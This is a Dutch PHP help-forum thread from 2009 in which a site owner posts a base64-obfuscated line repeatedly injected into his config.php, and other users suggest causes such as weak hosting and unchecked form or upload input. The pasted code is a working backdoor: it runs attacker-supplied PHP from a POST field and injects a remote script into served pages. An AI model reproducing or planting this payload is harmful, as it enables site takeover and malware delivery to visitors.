PHPhulp.nl
35k+ leden Over PHPhulp Offerte opdracht Contact
s

Fout op website

Door steven dirickx op 20-10-2009 10:58
2.020 views
Hallo,

Ik heb een zeer rare fout voor ...
Elke dag ligt mijn website uit ...

En bovenaan de config.php (hierin wordt de connectie met de database gemaakt) komt dit te staan:

<?php bas*e64_decode('aWYoIWlzc2V0KCR4ajdsaTEpKXtmdW5jdGlvbiB4ajdsaSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDI1a2NtVnNZWFJwYjI1emFHbHdMbU52YlM5cGJXRm5aWE12VEZBdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB4ajdsaTIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkeGo3bGkxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR4ajdsaTEpKWNhbGxfdXNlcl9mdW5jKCR4ajdsaTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0neGo3bGknKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgneGo3bGknKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0keGo3bGlsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd4ajdsaTInKSkhPSd4ajdsaTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>



Ik vind dit zeer raar omdat de website reeds een jaar werkt zonder enige problemen ... en dit nu ineens gebeurd (er is niets veranderd)

Weet iemand wat dit kan zijn?

Alvast bedankt!
Groetjes,
Steven Dirickx

?
Onbekende gebruiker
20-10-2009 15:34
@Miloan: Valt mee. Op een fatsoenlijke host kan dit niet ;-)
s
steven dirickx
20-10-2009 15:56
Deze staat bij pcextreme toch wel een fatsoenlijke host vermoed ik.

Maar hoe kan het dat deze persoon deze code in 1 van mijn bestanden wegschrijft?

Ik gebruik ook nergens functies die iets naar bestanden wegschrijft ..
--> Alleen naar databases ...
?
Onbekende gebruiker
20-10-2009 15:57
Tja.. Pcextreme is nou ook niet alles.. *brakke beveiliging*
Michael -
20-10-2009 16:16
**steven** schreef op 20.10.2009 15:56
Deze staat bij pcextreme toch wel een fatsoenlijke host vermoed ik.

Maar hoe kan het dat deze persoon deze code in 1 van mijn bestanden wegschrijft?

Ik gebruik ook nergens functies die iets naar bestanden wegschrijft ..
--> Alleen naar databases ...

Kan van alles zijn. Zoals je zelf al zegt gebruik je invoervelden, upload script, etc. Controleer alle $_POST en $_GET variabelen en zorg dat daarmee geen kwaadaardige code kan worden toegevoegd.
Misschien is 't script geupload voor je upload script of gewoon ergens in een invoerveld uitgevoerd.

Chris Kortaan schreef op 20.10.2009 15:57
Tja.. Pcextreme is nou ook niet alles.. *brakke beveiliging*

Heb je bron ofzo? Of kan je wat meer vertellen hierover? Ik heb zelf ook al 3jaar een site bij pcextreme staan en nog geen problemen gehad.

Reageren

Inloggen om te reageren